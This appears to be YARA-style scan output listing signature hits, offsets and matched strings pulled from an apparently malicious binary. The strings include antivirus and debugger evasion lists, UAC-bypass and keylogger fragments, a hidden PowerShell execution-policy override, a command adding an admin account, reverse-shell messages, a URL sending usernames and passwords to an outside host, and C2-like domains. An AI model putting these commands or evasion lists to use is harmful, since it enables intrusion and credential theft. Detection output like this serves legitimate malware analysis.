0 0x106da4 AntiAnalysisGeneric procmon.exe None any of them
0 0x106d99 AntiAnalysisGeneric procexp.exe None any of them
0 0x106e09 AntiAnalysisGeneric hiew32.exe None any of them
0 0x106de3 AntiAnalysisGeneric ollydbg.exe None any of them
0 0x106dd9 AntiAnalysisGeneric windbg.exe None any of them
0 0x106dee AntiAnalysisGeneric winhex.exe None any of them
0 0x106dce AntiAnalysisGeneric fiddler.exe None any of them
0 0x106dc1 AntiAnalysisGeneric wireshark.exe None any of them
0 0x103303 VirusDetectionGeneric 360TRAY.EXE None any of them
0 0x11709c VirusDetectionGeneric avp.exe None any of them
0 0x117080 VirusDetectionGeneric kavsvc.exe None any of them
0 0x1027e1 VirusDetectionGeneric RavMon.exe None any of them
1 0x1704cc 0x170535 SHA1 0!0 + None $1
1 0x10876d 0x1647f5 RC4 0w,a None $1
0 0x10b62f AEC c|w{ko None any of them
0 0x117071 SecurityProducts AVGIDSAgent.exe None any of them
0 0x1039e1 SecurityProducts avgtray.exe None any of them
0 0x11709c SecurityProducts avp.exe None any of them
0 0x1070ec SecurityProducts blackd.exe None any of them
0 0x1070f6 SecurityProducts blackice.exe None any of them
0 0x196f8d SecurityProducts chrome.exe None any of them
1 0x106f5e 0x107151 SecurityProducts client.exe None any of them
0 0x114893 SecurityProducts DefWatch None any of them
0 0x114893 SecurityProducts DefWatch.exe None any of them
0 0x13a1d3 SecurityProducts ERA.EXE None any of them
0 0x116478 SecurityProducts firefox.exe None any of them
0 0xfde7c SecurityProducts fmon.exe None any of them
0 0x12455d SecurityProducts Guard.exe None any of them
0 0x117095 SecurityProducts kav.exe None any of them
0 0x117080 SecurityProducts kavsvc.exe None any of them
0 0xf9ae4 SecurityProducts McpRoXy.exe None any of them
0 0x115dcc SecurityProducts MSPUB.EXE None any of them
9 0xfa1f5 0xfa275 0x1138e5 0x1158ba 0x11668d 0x1187c3 0x12492f 0x129572 0x13c489 0x14ee40 SecurityProducts n.exe None any of them
13 0xfc6cc 0xfde7f 0x1027e6 0x104bb4 0x106daa 0x107109 0x12db2f 0x1402e6 0x146b4c 0x14c7ed 0x14d25e 0x14d62a 0x14d80a 0x14e4fe SecurityProducts n.exe None any of them
1 0x116c32 0x116c56 SecurityProducts N.exe None any of them
2 0x129806 0x145f2c 0x14d78a SecurityProducts n.EXE None any of them
0 0x100b28 SecurityProducts outlook.exe None any of them
0 0x1335cc SecurityProducts POWERPNT.exe None any of them
0 0x106d99 SecurityProducts procexp.exe None any of them
0 0x1027e1 SecurityProducts RavMon.exe None any of them
0 0xfde3b SecurityProducts SavService.exe None any of them
40 0xfbff6 0x103462 0x11a445 0x11ab07 0x11ab31 0x11ea30 0x11ea8b 0x120455 0x120dbb 0x1402e3 0x1402f0 0x1452da 0x1456d6 0x14570c 0x145a76 0x147188 0x147f1f 0x148264 0x148d91 0x149d58 0x149d68 0x149e3a 0x14a169 0x14a1cb 0x14b690 0x14b69f 0x14b6ca 0x14b6d9 0x14b7b5 0x14b7e7 0x14b813 0x14b822 0x14b83c 0x14c151 0x14d7b4 0x14e3af 0x14ecc7 0x14f74a 0x14fa90 0x14fed0 0x1a97d6 SecurityProducts Scan None any of them
62 0xfdc1d 0xfdc52 0xfdc74 0x10d1f8 0x114a88 0x1167da 0x11a4a8 0x11a4b2 0x11a4c7 0x11a4e6 0x11a4f2 0x11a9e5 0x11aafa 0x11ab2c 0x11ac51 0x11ad01 0x11c468 0x11c65f 0x11c6b6 0x11c6c7 0x11fe16 0x120482 0x1225e1 0x126a0b 0x13219c 0x140b4a 0x140c5c 0x144058 0x146b55 0x1474c4 0x147528 0x147b86 0x147bbd 0x148223 0x148291 0x148b2e 0x149cdb 0x149cf0 0x149f66 0x14a1d6 0x14b603 0x14b9eb 0x14ba5b 0x14e1f7 0x14eb7a 0x14eb87 0x14eb94 0x14ece6 0x14ecff 0x14ed34 0x14ed90 0x14edd6 0x14ef21 0x14f5fe 0x14f67c 0x14f6d9 0x14f714 0x14f78d 0x14f83c 0x14f8a6 0x1a233e 0x1a5f83 0x1aa45f SecurityProducts scan None any of them
5 0x117632 0x129800 0x129814 0x145f26 0x145f44 0x14ee3a SecurityProducts scan None any of them
9 0x14622c 0x146256 0x1465c8 0x14a6e5 0x14a709 0x14a71b 0x14d784 0x14fa4b 0x14fac0 0x14faea SecurityProducts Scan None any of them
1 0x146ff8 0x14702c SecurityProducts SCAN None any of them
2 0x149e5b 0x14a122 0x14a13f SecurityProducts SCAN None any of them
0 0x107134 SecurityProducts smc.exe None any of them
0 0x117062 SecurityProducts spideragent.exe None any of them
0 0xf9b4d SecurityProducts system.exe None any of them
0 0x12455a SecurityProducts USBGuard.exe None any of them
0 0x12d843 SecurityProducts VPDN_LU.exe None any of them
0 0x100c39 SecurityProducts winword.exe None any of them
0 0x14dba5 SecurityProducts wordpad.exe None any of them
0 0x107146 SecurityProducts zapro.exe None any of them
0 0x10714f SecurityProducts zlclient.exe None any of them
0 0x10715b SecurityProducts zonealarm.exe None any of them
0 0xfaa78 Path /kys_allow_put.asp?type=/kys_allow_get.asp?name=unsuccessfully!waiting......reboot None any of them
0 0x103589 Path /Library/Application Support/JavaWcom.JavaW.plistlaunchctl load launchctl start {\\rtMsftedit 5.41.15.15076f746b6c6f6164722e5752417373656d626c792e31004d53436f6d63746c4c69622e546f6f6c6261722e32On None any of them
0 0x117519 Path /selfservice/microsites/search.php?%016I64d/solutions/company-size/smb/index.htm None any of them
0 0x117f06 Path /dev/pts/4/tmp/1408.logSHAREImagePathZwUnloadDriverZwLoadDriver/s /u_time64PCC_CMD_PACKETPCC_BASEMODPCC_SYSPCC_PROCESSPCC_FILEbcdedit -set testsigningupdate.microsoft.com_crt_debugger_hookue8G5\\Device\\-%s-%04dFAL2.03XXXXXXXXXXXXXXX None any of them
0 0x125d36 Path /zapoy/gate.php None any of them
0 0x12fde4 Path /c for /L %%i in (1,1,2) DO ping 127.0.0.1 -n 3 & type %%windir%%\\notepad.exe > %s & del /f %s%SYSTEMROOT%\\temp\\_dbg.tmp%SYSTEMROOT%\\SysWOW64\\mspool.dll%SYSTEMROOT%\\System32\\dpcore16t.dll%SYSTEMROOT%\\System32\\wdigestEx.dll%SYSTEMROOT%\\System32\\mspool.dll%SYSTEMROOT%\\System32\\kernel32.dll%SYSTEMROOT%\\SysWOW64\\iastor32.exe%SYSTEMROOT%\\System32\\msvcse.exe%SYSTEMROOT%\\System32\\mshtaex.exe%SYSTEMROOT%\\System32\\iastor32.exe%SYSTEMROOT%\\SysWOW64\\mshtaex.exeInstaller.exeInfo: Process %sError None any of them
0 0x13db29 Path /tag=info&id=15\\Temp\\iExplorer.exe\\Temp\\\"TSG\"greensky27.vicp.net None any of them
0 0x143135 Path /update?id=%8.8x None any of them
0 0x14b20a Path /x86/BypassUac.exe/x64/BypassUac.exe/x86/BypassUacDll.dll/x64/BypassUacDll.dllAFX_IDP_COMMAND_FAILUREW None any of them
0 0xf8557 Path C:\\Users\\7\\Desktop\\dll - bak\\Release\\dll.pdbwinsta0WINSTA0TVT DEMOCONFIG-DESTORY\\\\.\\PIPE\\RUN_AT_SESSION (%d)GULP#   !    yyBINDATA-PdPDwritedroofiledroocmddrooHideUpdatePzfileHideSysUpfileHideSysCmdDesnation %s is small than finished!2.F2.F44444ACCELORATORT1Y943jIhk09lkjdsMYGAMEHAVETHISISASUPERNEWGAMENOWBEGINTHIS324NEWGAMEISAPI_CONNECTBD_SOCKBD_DNSPCC_SO None any of them
0 0xfa54d Path z:\\Work\\Make Troy\\hj8u@P None any of them
0 0x101191 Path d:\\codespace\\powerock\\exp\\afdpre\\bin\\afdpre.pdbGuiWAng!@#9bd*-a add user(admin$/GuiWAng!@#9bd*) to admin[ERR] get haltable addresss fail[ERR] get ZwDeviceIoControlFile fail[ERR] get native function pointers fail˺willweiweiӵadministratorɹ None any of them
0 0x101db0 Path E:\\1510prj\\t `EX-mode: pushX-mode: popProgramm was started at %02i:%02i:%02iStart finging of LAN hostsFinding was fault. Unexpective errorStart finging of OPC ServersWas found %i OPC ServersOPCServer%02i.txtShortInfoHarvesterCmd.dllWin32_SystemEnclosureGetFileCmd.dll<x></x><y></y><z></z><q></q><?xml version=\"1.0\ None any of them
0 0x102e6f Path D:\\hkdoor_src\\hkdoor_src\\hkdoor_src\\hkdoor_src_x32\\filterdriver\\Release\\DrvFltIp.pdbsniffitmyWorkStart%s\\sadeep.dll%s\\cangur.dathttp:%sport:%d&VER=Cobra 1.2&MARK=&ID=NoID&END=1 %d.%d&L_IP=DRIVE=%c:&#1A&2B@doublesafeZMUNK:VistaWin2000Win2003Win2003R2Win2008Win2008R2Win2012Win32SWin7Win8Win95Win95OSR2Win98Win98SEWinMeWinXP%Hso0yh4:%HHPhMedusa has finishedJoMo-Kun / Foofus NetworksMedusa v.%s./ss 5631 -a green Attack PcAnyWhere in 5 secondsmedusa -H $1.pc -U usersrequires an A network as ar None any of them
0 0x10654b Path C:\\Windows\\system32\\cmd.exeinflate 1.1.3 Copyright 1995-1998 Mark AdlerBinderCarrier.pdb\\StringFileInfo\\040904B0\\CompanyName\\StringFileInfo\\040904B0\\InternalName\\StringFileInfo\\040904B0\\FileDescriptionCreateObject(\"WScript.Shell\").Run \"%s %s\"tmp.vbstmp1.vbsFireMalv\\FireMalv\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\<h1>Success</h1><h1>Sorry, Path not found.</h1>xl/vbaProject.binxl/cu None any of them
0 0x11f24c Path x:\\fanny.bmpd:\\fanny.bmpc:\\windows\\system32\\kernel32.dllSystem\\CurrentControlSet\\Services\\USBSTOR\\EnumSystem\\CurrentControlSet\\Services\\PartMgr\\Enum\\AGENTCPD.DLLagentcpd.dllPADupdate.exedll_installer.dll\\restore\\Q:\\__?__.lnkSoftware\\Microsoft\\MSNetMng\\shelldoc.dllfile size = %d bytes\\MSAgentGlobal\\RPCMutexGlobal\\DirectMarketingnls_933w.dllBINARYKfAcquireSpinLockHAL.dllREAD_REGISTER_UCHAR@STATIC$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaOriginal Innovations None any of them
0 0x123fbe Path F:\\Projects\\Bot\\Bot\\Release\\Ism.pdbC:\\ddd\\wer2.txt\\Microsoft\\Windows\\tmp43hh11.txtpowershell.exe -nologo -windowstyle hidden -c \"Set-ExecutionPolicy -scope currentuserpowershell.exe -c \"Set-ExecutionPolicy -scope currentuser -ExecutionPolicy unrestricted -f; . \"c:\\windows\\temp\\tmp8873taskkill /im winit.exe /finvoke-psuacme-method oobe -payload \"\"C:\\ProgramData\\stat2.datInvoke-bypassuacStart Keylog None any of them
0 0x12948c Path F:\\Excalibur\\Excalibur\\Excalibur\\bin\\oSaberSvc.pdbcmd.exe /c MD https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=0&rsv_idx=1&tn=baidu&wd=ip138CloudRun.exeSaberSvcB.exeSaberSvc.exeSaberSvcW.exetianshiyed@iaomaomark1#23mark123tokenmarkqwebjiuga664115Internet Connect Failed!WOODTALE TECHNOLOGY INCFlyingbird Technology LimitedNeoact C None any of them
0 0x129927 Path C:\\Users\\cmd\\Desktop\\msacm32\\Release\\msacm32.pdbpip creat failedCraatePipeare you there? success kill process okVista|08|Win7are you there!@#$%^&*()_+.hotp1ǀdAVCObfuscationQ2>sAVCSetiriControl3+ȃMhʃ None any of them
0 0x12eecc Path J:\\chong\\nod\\Release\\SslMM.exenetwork.proxy.sslHost: %ws:%dSCHANNEL.DLL\\Microsoft\\Internet Explorer\\conhost.exe\\Microsoft\\Internet Explorer\\dll2.xor\\Microsoft\\Internet Explorer\\HOOK.DLL\\Microsoft\\Internet Explorer\\main.dll\\Microsoft\\Internet Explorer\\nvsvc.exe\\Microsoft\\Internet Explorer\\SBieDll.dll\\Microsoft\\Internet Explorer\\mon\\Microsoft\\Internet Explorer\\runas.exeSOFTWARE\\360Safe\\LiveupSoftware\\360safeSOFTWARE\\kingsoft\\AntivirusSOFTWARE\\Avira\\Avira De None any of them
0 0x13f5bb Path c:\\oil\\feet\\Seven\\Send\\Gather\\Dividerail.pdblisten abovefamilycould costSetSystemTimeAdjustment\\payload\\payload.x86.pdbUSER_PRIV_GUESTUSER_PRIV_ADMINUSER_PRIV_USERPPSWVPPWinSCard.dll/c start "" "%s" %scmd.exerunSndVol.exeRedirectEXEsamsrv.dllHookDC.dllCDLocateCSystemSamIRetrievePrimaryCredentialsSamIRetrieveMultiplePrimaryCredentials3H$@H3MHXH\$Ht$WH None any of them
0 0x145b74 Path c:\\Documents and Settings\\Administrator\\Got WMI process Pid: %dThis exploit will executeRunning reverse shell<description>CHKen QQ:41901298</description>version=\"9.9.9.9\"name=\"CH.Ken.Tool\"to HOST!SS.EXElstrlen0RtlUnwnc -l -p port [options] [hostname] [port]invalid connection to [%s] from %s [%s] %dpost-rcv getsockname failedFailed to execute shell, error = %sUDP listen needs -p arghttp://www.site.com/test.dll?user=%USERNAME&pass=%PASSWORDUsername: \"%s\", Password: \"%s\", Remarks: \"%s\"user:\"%s\" None any of them
0 0x145f65 Path C:\\WINDOWS\\temp\\pojie.exe /l=C:\\WINDOWS\\temp\\s.exeC:\\WINDOWS\\temp\\s.exe tcp explorer.exe http://www.hackdos.comFailed to read file or invalid data in file!WTNE / MADE BY E COMPILER - WUTAO The interface of kernel library is invalid!eventvwrFailed to decompress data!NOTEPAD.EXE result.txtGetLogonS/showthread.php?t=156643sedebugnameValueUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322SOFTWARE\\Classes\\HTTP\\shell\\open\\commandSYSTEM\\ControlSet001\\Services\\%sGloba None any of them
0 0x148112 Path c:\\windows\\system32\\command.com /c Easy Usage Version -- Edited By: racle@tian6.comOH,Sry.Too long command.Success! Commander.Hey,how can racle work without ur command ?The exploit thread was unable to map the virtual 8086 address space[+] Usage: VNC_bypauth <target> <scantype> <option>========RealVNC <= 4.1.1 Bypass Authentication Scanner=======[+] Type VNC_bypauth <target>,<scantype> or <option> for more informationsVNC_bypauth -i 192.168.0.1,192.168.0.2,192.168.0.3,...-vn:%-15s:%-7d connection close None any of them
0 0x14c35a Path C:\\Program Files\\DevStudio\\VB\\VB5.OLBMailTo:szj1230@yesky.comCommand1_Clicksoftware\\microsoft\\internet explorer\\typedurlsvb5chs.dllMSVBVM50.DLLsystem.dllset sys=server.CreateObject (\"system.contral\") Public Function reboot(atype As Variant)t& = ExitWindowsEx(1, atype)atype=request(\"atype\") AceiveX dllDeclare Function ExitWindowsEx Lib \"user32\" (ByVal uFlags As Long, ByVal sys.reboot(atype)' -- check for a command that we None any of them
0 0x1643b1 Path C:\Windows\SoftWareProtector\ЌɁQQQUSVW`ģ+=t QhhUSVW`ģ+=t Qhh`UjhhhdPd%XSVWe(3Ҋԉ$` jhh^{!={P˴H,!^!DŽ|$` ;s;rQV+^u3ȋQQ LoadL None any of them
0 0x1651c6 Path c:\0000001.datt#JAPRB0XRHHZXBtJI| JuB\Í@~$P None any of them
0 0x18a55f Path C:\Windows\SoftWareProtector\YQPWPsձsջr%surrrrU-6K'{!ls|NI݁謫$C?4B$C<d$USVWM3_^[Ë`^X-1+v<3fNt1^ ށVUX-wƉEZS3j33U@hÜ`]UX+PPT$ 3 None any of them
0 0x7c169 Path ole32.dll None any of them
0 0xf9d47 Path cmd.exee None any of them
0 0xff241 Path wmiexec.vbs None any of them
0 0x104727 Path msdnet32.dll None any of them
0 0x104baf Path green.exe None any of them
0 0x1068ea Path sbiedll.dlldbghelp.dllap None any of them
0 0x108741 Path crypt32.dll None any of them
0 0x115130 Path fxsst.dll None any of them
0 0x116477 Path firefox.exe None any of them
0 0x116559 Path http://google.com/Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0; MALC)Operating System\"<Command></Command>\" /d \"nKERNEL32.DLL@ReturnValueID: 0x%xName: %Scmd.exe /C FOR /L %%i IN (1,1,%d) DO IF EXIST& SYSTEMINFO) ELSE EXITdomcommon.exejpic.gov.syaiomgr.exeperfaudio.datCasper_DLL.dll{KY7JB&Yc-W@{4216567A-4512-9825-7745F856}***** SYSTEM INFORMATION *********** SECURITY INFORMATION ******Antivirus: Firewall: ***** None any of them
0 0x116696 Path jpic.gov.sya None any of them
0 0x1166b5 Path perfaudio.dat None any of them
0 0x116aa6 Path acrotray.exe None any of them
0 0x116ba0 Path mcs.exe None any of them
0 0x116e83 Path server.dll None any of them
0 0x118bc8 Path romanian.antih None any of them
0 0x118c03 Path ugly.goril None any of them
0 0x118da1 Path ca.dll None any of them
0 0x118f02 Path cmd.exe None any of them
0 0x11ef24 Path svrg.pdb None any of them
0 0x11f675 Path p32.sysunilay.dll None any of them
0 0x11f6ec Path msrstd.pdbm None any of them
0 0x11f97e Path volrec.pdb None any of them
0 0x12404e Path powershell.exe None any of them
0 0x12464f Path 32.dadva None any of them
0 0x126524 Path ex.dll None any of them
0 0x1277d7 Path network.proxy.socks None any of them
0 0x1298a3 Path www.micro1.zyns.com None any of them
0 0x12a066 Path hlpuctf.dll None any of them
0 0x12a078 Path kl.dll None any of them
0 0x12a088 Path iomus.dll None any of them
0 0x12a1ee Path hauthuid.dll None any of them
0 0x12a349 Path rsfvxd.dattsb386.datfrmmlg.datsmdhost.dll None any of them
0 0x12a394 Path app.stream-media.net None any of them
0 0x12a80b Path msupdater.exemsupdater32.exem None any of them
0 0x12a845 Path msupdate.pif None any of them
0 0x12ac82 Path h.data None any of them
0 0x12b593 Path ntkrnlpa.exe None any of them
0 0x12b839 Path disp.dll None any of them
0 0x12cfcc Path http://www.jmicron.co.tw None any of them
0 0x12d18a Path http://www.realtek.com None any of them
0 0x12da44 Path navlu.dll.url None any of them
0 0x12e4b5 Path msimghlp.dllximarsh.dllmsximl.dll None any of them
0 0x12e6be Path www.bing.com None any of them
0 0x1302f6 Path http://www.wasabii.com.tw None any of them
0 0x1317ab Path info.inipi4izd6vp0.com None any of them
0 0x13202b Path ddos.tf None any of them
0 0x1336ac Path iphlpsvc.tmp None any of them
0 0x13c53c Path http://extcitrix.we11point.com/vpn/index.php?ref=1%SystemRoot%\\System32\\svchost.exe -k msupdateManagement Support Team1DTOPTOOLZ Co.,Ltd.0SEOUL1Hello World!CONIN$SetConsoleModeGetEnvironmentStringsGetFileTypeHeapCreateVirtualFreeGetOEMCPFlushFileBuffersSetStdHandleextension: .jpgyahoo kec\\Control\\zxplughttp://www.facebook.com/comment/update.exeShared a shell to %s:%s Successfullyapplication/x-ms-applicationapplication/x-ms-xbapapplication/vnd.ms-xpsdocumentapplication/xaml+xmlapplication/x-shockwave-fl None any of them
0 0x13db91 Path otna.vicp.netsmithking19.gicp.net None any of them
0 0x14542a Path http://www.vip80000.com/hot/index.htmlGetConnectStringCnCerT.Safe.SSClone.dll(*.JPG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.BMP;*.GIF;*.ICO;*.CUR|JPGklock.dllErreur : le bureau courant (klock de mimikatz pour WindowsC:\\Windows\\Temp\\Cmd.txtget_Form1http://localhost/retomysql/pista.aspx?id_pista=1SELECT ASCII(SUBSTR(username,{0},1)) FROM US None any of them
0 0x1466d9 Path http://www.foundstone.com None any of them
0 0x146824 Path xsiff.exe None any of them
0 0x14703f Path ntwdblib.dll None any of them
0 0x148a63 Path http://www.wzpg.comip None any of them
0 0x148c02 Path kelloworld.dllk None any of them
0 0x14c423 Path vb5chs.dll None any of them
0 0x1506b8 Path cvrit000.bat None any of them
0 0x150881 Path scardprv.dll None any of them
0 0x150c1c Path uwauserv.dll None any of them
36 0x153836 0x154e3d 0x15e0df 0x15ee54 0x160fc2 0x161a80 0x161b0d 0x161e59 0x161f5a 0x1623d7 0x163dcc 0x165540 0x1697d2 0x16ab19 0x16e37a 0x16f9d1 0x16fdb0 0x17005d 0x172970 0x172a2c 0x172ff3 0x17a0bb 0x17bf8f 0x17d081 0x17e510 0x180a68 0x180f52 0x1811e9 0x18502c 0x1860ef 0x186c6f 0x18ae88 0x18c393 0x18d3a1 0x18d3f6 0x192c8d 0x19392f Path kernel32.dll None any of them
6 0x154eb9 0x15f848 0x16abc5 0x17a419 0x181076 0x185039 0x185630 Path user32.dll None any of them
0 0x15729c Path temp.exe None any of them
2 0x157914 0x159b78 0x161694 Path mscoree.dll None any of them
0 0x16748c Path elicen40.dll None any of them
0 0x17b015 Path s.nah None any of them
0 0x157901 NET_DLL_Detecton_1 _CorDllMainmscoree.dll% None $1
0 0x161681 NET_executable_Detecton_1 _CorExeMainmscoree.dll% None $1
0 0x17c79f _3DMark_Database_file_Detecton_1 3DMark Database File None $1
0 0x177ed9 ACE_Archive_Detecton_1 **ACE** None $1
0 0x1921fe ACE_Archive_Detecton_1 **ACE** None $1
1 0x15ac54 0x15e5ef ACProtect_1_4x_Detecton_1 GetProcAddressGetModuleHandleALoadLibraryAExitProcessMessageBoxAMineImp None $1
0 0x15e5ef ACProtect_1_4x_Detecton_Number_2 GetProcAddressGetModuleHandleALoadLibraryAExitProcessMessageBoxAMineImport_Endss None $1
0 0x15e569 ACProtect_UltraProtect_1_0X_2_0X_Detecton_Number_2 KERNEL32.DLLUSER32.DLLGetProcAddressGetModuleHandleALoadLibraryAExitProcessMessageBoxAMineImport_Endss None $1
1 0x15f83b 0x185623 ActiveMARK_5_x_Detecton_1 --MPRMMGVA--user32.dllMessageBoxAThis application cannot run with an active debug None $1
0 0x185623 ActiveMARK_5_x_Detecton_Number_2 --MPRMMGVA--user32.dllMessageBoxAThis application cannot run with an active debugger in memory. Please unload the debugger and restart the application.Warning None $1
0 0x1732d5 Adlib_Sample_Audio_file_Detecton_1 GOLD SAMPLE None $1
1 0x16da9a 0x1721e7 Alex_Protector_0_4_beta_1_Detecton_1 `ǃ3hhhǃ,$<@h None $1
1 0x163a8b 0x17e759 Alex_Protector_1_0_beta_2_Detecton_1 `]@$D$ 3XPd5d% None $1
0 0x180a01 Alias_PIX_Vivid_IMG_Graphics_format_Detecton_1 ect None $1
0 0x183406 Alias_PIX_Vivid_IMG_Graphics_format_Detecton_1  None $1
0 0x17d0f2 Amiga_AIFF_8SFX_Audio_file_Detecton_1 FORM8SVXVHDR None $1
0 0x186791 Amiga_IFF_ILBM_Graphics_format_Detecton_1 FORMILBMBMHD None $1
0 0x16b29b Anti007_V2_6_Detecton_1 LoadLibraryAGetProcAddressVirtualProtectVirtualAllocVirtualFreeGetSystemDirectoryACreateFileAWriteFileCloseHandleExitProcess None $1
2 0x15d037 0x17b775 0x1849d3 AntiDote_1_0_Demo_1_2_Detecton_1 GetCommandLineAGetVersionExAsGetModuleFileNameAzWaitForSingleObjectResumeThread)SetThreadContextWriteProcessMemorykVirtualAllocExReadProcessMemoryGetThreadContextbCreateProcessAKERNEL32.dll None $1
0 0x1849d3 AntiDote_1_0_Demo_Detecton_Number_2 GetCommandLineAGetVersionExAsGetModuleFileNameAzWaitForSingleObjectResumeThread)SetThreadContextWriteProcessMemorykVirtualAllocExReadProcessMemoryGetThreadContextbCreateProcessAKERNEL32.dllMessageBoxA&CharLowerAUSER32.dllstrstrmalloc^freeLfclose_filbufdftellbfseekWfopenI__CxxFrameHandlerMSVCRT.dll None $1
0 0x17b775 AntiDote_V1_2_Detecton_1 GetCommandLineAGetVersionExAsGetModuleFileNameAzWaitForSingleObjectResumeThread)SetThreadContextWriteProcessMemorykVirtualAllocExReadProcessMemoryGetThreadContextbCreateProcessAKERNEL32.dll&CharLowerAUSER32.dll^freeLfclose_filbufmallocdftellbfseekWfopenstrstrMSVCRT.dll None $1
0 0x16b3da aPack_v0_98_m_Detecton_1 ȎP33P;v None $1
0 0x177b0e aPack_v0_98b_com_Detecton_1 WÿWWP None $1
0 0x155eb1 aPack_v0_98b_DS_ES_not_saved_Detecton_1 ˺33KۍJu None $1
2 0x17e861 0x18320b 0x1909c5 aPack_v0_98b_DS_ES_not_saved_Detecton_1 ˺33KۍJu None $1
0 0x159adc aPack_v0_98b_exe_Detecton_1 м None $1
0 0x162da8 Apex_3_0_alpha_Detecton_1 _Q@0FGYh None $1
0 0x1696c0 ARM_Protector_0_1_Detecton_1 ` ]EU]^@ @ 1@ X None $1
0 0x156f04 ARM_Protector_0_2_Detecton_1 ` ]EU] @ @ 2@ None $1
0 0x16a747 ARM_Protector_0_3_Detecton_1 ` ]EU]$@ $@ K9@ XPX@PÊF*[S[CS2 2 *[CSÈGJu None $1
0 0x1696c0 ARM_Protector_v0_1_Detecton_1 ` ]EU]^@ @ 1@ XPX@PÊF*[S[CS2 2 *[CSÈGJu None $1
1 0x155004 0x182ed1 Armadillo_3_01_3_05_Detecton_1 `]PQ YXPQ YXPQ None $1
1 0x158450 0x1767cb Armadillo_3_10_Detecton_1 UjhDh BdPd%XSVWeLAD3ҊԉDȁ Dʉ D None $1
1 0x15e4f4 0x188011 Armadillo_4_00_0053_Detecton_1 Ujh KhHdPd%XSVWe1K3ҊԉKȁ Kʉ K None $1
1 0x16ca70 0x17b063 Armadillo_4_10_Detecton_1 UjhLhIdPd%XSVWe1L3Ҋԉ|Lȁ xLʉ tLp None $1
1 0x16f674 0x192a53 Armadillo_4_20_Detecton_1 UjhLhIdPd%XSVWe1L3ҊԉLȁ Lʉ |Lx None $1
1 0x165a63 0x18c6ab Armadillo_4_30_4_40_Detecton_1 Ujh@hdPd%XSVWe3Ҋԉ0ȁ ,ʉ ($ None $1
0 0x180597 Armadillo_4_30a_Detecton_1 DdeData initialized (ANSI), app strings are '%s' and '%s'DdeData initialized (UNICODE), app strings are '%S' and '%S'PutString('%s')GetString(), falseGetS None $1
1 0x178077 0x18ff4f Armadillo_4_40_Detecton_1 1.1.4ƶ$Ҥw@'oP)$ERҌ n_B'iWU D*ke1(}Iߵ]sBUSystemSystemDDE ProcessingSwPDDEDDE ProcessingSwPDDE< None $1
0 0x17f62a Armadillo_4_44a_public_build_Detecton_1 U SVWEPEEQAAAAAAAAAAAAAAAAAIA IRAZ#YZE 3 M}t UUEP_^[]U SVWEPEES2CCKQCY@[E 3 M}t UUEP_^[]U SVWEPEEp|tS#Q, ̀̀"pɀɀɀ p|tɀ"Y[ESrCC None $1
0 0x188011 Armadillo_v4_00_0053_Detecton_1 Ujh KhHdPd%XSVWe1K3ҊԉKȁ Kʉ KK3VxYuj YuC0KKK- None $1
0 0x17b063 Armadillo_v4_10_Detecton_1 UjhLhIdPd%XSVWe1L3Ҋԉ|Lȁ xLʉ tLpL3VxYuj YuC0LLХL- None $1
0 0x192a53 Armadillo_v4_20_Detecton_1 UjhLhIdPd%XSVWe1L3ҊԉLȁ Lʉ |LxL3VxYuj YuC0LLإL- None $1
0 0x18c6ab Armadillo_v4_30_4_40_Detecton_1 Ujh@hdPd%XSVWe3Ҋԉ0ȁ ,ʉ ($3VxYuj YuC$ None $1
0 0x1635c9 Armadillo_v4_30_4_40_Detecton_Number_2 `]PQҜ ɋYXPQҜ ɋYXPQҜ  None $1
0 0x15f8e3 AsCrypt_v0_1_Detecton_1 Q None $1
0 0x15f8d3 AsCrypt_v0_1_Detecton_Number_2 None $1
0 0x15f916 AsCrypt_v0_1_Detecton_Number_3 None $1
0 0x161d99 AsCrypt_v0_1_Detecton_Number_4 None $1
0 0x18f945 AsCrypt_v0_1_Detecton_Number_4 $ None $1
0 0x154d7c ASDPack_2_0_Detecton_1 Kernel32.dllIGetModuleHandleA None $1
0 0x154dd4 ASDPack_2_0_Detecton_Number_2 [C{tC None $1
0 0x16a4e4 ASDPack_v1_0_Detecton_1 UVS\@[ @} uUOj], @ @v t uu u[^ Uj !@ @j@h @j,!@ @ @ @P @Pm_ None $1
0 0x175035 Aspack_v2_12_Detecton_1  P None $1
0 0x196324 Aspack_v2_12_Detecton_1 `]EU]݁""e.PL&]^SPH None $1
18 0x1548be 0x155ece 0x1561f2 0x15800d 0x16430c 0x164fac 0x1697f8 0x17135e 0x172731 0x178ea4 0x17eb46 0x181402 0x183817 0x188d65 0x189e7c 0x18bb0d 0x18c03d 0x193246 0x196324 ASPack_v2_12_Detecton_1 `]EU None $1
2 0x1697f8 0x17135e 0x172731 ASProtect_1_23_RC4_build_08_07_dll_Detecton_1 `]EU]݁}Mu t$(]Nu1ESPS E5P None $1
1 0x164fab 0x172730 ASProtect_1_23_RC4_build_08_07_exe_Detecton_1 `]EU]݁}Mu t$(]Nu1ESPS E5P None $1
2 0x1620eb 0x172cab 0x17fffd ASProtect_2_0_Detecton_1 h@ None $1
0 0x1776c4 ASProtect_2_0_Detecton_1 h`@ None $1
0 0x1776c4 ASProtect_2_3_SKE_build_04_26_Beta_Detecton_1 h`@ le> 8Z `mQ-/bZkn &~; ^b}xn None $1
2 0x1548be 0x183817 0x18bb0d ASProtect_SKE_2_1_2_2_dll_Detecton_1 `]EU]݁}Mu t$(]Nu1ESPS E5P None $1
1 0x1561f1 0x183816 ASProtect_SKE_2_1_2_2_exe_Detecton_1 `]EU]݁}Mu t$(]Nu1ESPS E5P None $1
0 0x183816 ASProtect_SKE_2_1_2_2_exe_Detecton_Number_2 `]EU]݁}Mu t$(]Nu1ESPS E5P#PPEN[t #t53VjVuN^u$3ҋEAtRRu5ЋE5t hju5U=[ aujX 3@ None $1
0 0x183816 ASProtect_SKE_2_1_2_2_exe_Detecton_Number_3 `]EU]݁}Mu t$(]Nu1ESPS E5P#PPEN[t #t53VjVuN^u$3ҋEAtRRu5ЋE5t hju5U=[ aujX 3@ None $1
0 0x178ea3 ASProtect_SKE_2_3_Detecton_1 `]EU]݁}Mu t$(]Nu1ESPS E5P#PPEN[t #t53VjVuN^u$3ҋEAtRRu5ЋE5t hju5U=[ aujX 3@ None $1
0 0x158c4e ASProtect_v1_2_Detecton_1 `5xV4Iu]EU None $1
